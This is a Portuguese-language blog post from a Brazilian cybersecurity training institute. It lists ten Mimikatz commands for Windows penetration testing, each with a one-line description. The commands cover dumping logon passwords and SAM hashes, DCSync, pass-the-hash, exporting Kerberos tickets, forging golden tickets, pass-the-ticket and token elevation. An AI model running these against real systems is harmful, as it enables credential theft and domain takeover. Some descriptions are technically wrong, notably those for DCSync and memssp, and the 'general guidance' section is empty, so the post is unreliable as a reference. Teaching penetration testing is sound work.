BLOG IBSEC

A imagem mostra uma pessoa usando um moletom com capuz, digitando em um laptop. Ao fundo, há gráficos abstratos em azul representando conexões digitais e uma sensação de ciberespaço. No canto inferior esquerdo, há o logotipo do IBSEC (Instituto Brasileiro de Cibersegurança) com a impressão digital estilizada.

No cenário em constante evolução da cibersegurança, as ferramentas e técnicas utilizadas tanto pelos defensores como pelos atacantes estão em constante avanço. Entre a infinidade de ferramentas disponíveis, o Mimikatz se destaca como um utilitário particularmente poderoso e versátil que se tornou um elemento básico nos arsenais tanto de profissionais de segurança quanto de agentes mal-intencionados. Desenvolvido por Benjamin Delpy, o Mimikatz ganhou reputação por sua capacidade de extrair senhas de texto simples, hash, códigos PIN e tickets Kerberos da memória, tornando-o um recurso inestimável para compreender e lidar com roubo de credenciais e escalonamento de privilégios em ambientes Windows.

Dito isso, abaixo separamos para você 10 comandos para testes de  invasão Windows Mimikatz com orientações para cibersegurança, vamos lá!

10 Comandos para Testes de  Invasão Windows Mimikatz

  1. privilege::debug

Concede ao processo atual privilégios de depuração,permitindo o acesso a tokens de segurança.

  1. sekurlsa::logonpasswords

Extrai senhas de logon em texto plano e hashs de senha do sistema Windows.

  1. sekurlsa::pth /user:<usuário> /domain:<domínio> /ntlm:<hash>

Realiza a técnica “Pass-the-Hash”, autenticando-se em um sistema remoto com um hash de senha.

  1. sekurlsa::tickets /export

Extrai tickets Kerberos para análise ou uso posterior, incluindo Golden Tickets e Silver Tickets.

  1. lsadump::sam

Extrai o banco de dados SAM (Security Account Manager), que armazena informações de conta de usuário e senhas em hashes.

  1. lsadump::dcsync /domain:<domínio>

Obtém hashes de senha de contas de usuário do Active Directory usando a função DRSReplicaGetInfo().

  1. kerberos::golden /user:<usuário> /domain:<domínio> /sid:<SID>

Gera um Golden Ticket para obter acesso persistente a sistemas Windows.

  1. kerberos::ptt <caminho do ticket.kirbi>

Passa um ticket Kerberos forjado para o sistema, permitindo acesso como o usuário especificado no ticket.

  1. token::elevate

Eleva o token de segurança atual para o token mais alto disponível, concedendo privilégios administrativos.

  1. misc::memssp

Ativa o protocolo de segurança de provedor de serviços de memória (MemSSP) para passar hashes de senha para autenticação.

Orientações gerais

Confira também: 10 Ferramentas Windows para Cibersegurança

Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre cibersegurança, confira os nossos cursos disponíveis

Rua Conceição de Monte Alegre, 107 - Bloco B
10º andar, Brooklin - São Paulo, SP - Brasil | CEP: 04563-060

contato @ ibsec.com.br

© 2024 Por IBSEC - Instituto Brasileiro de Cibersegurança | CNPJ: 07.697.729/0001-08

Todos os diretos reservados. | Termos | Privacidade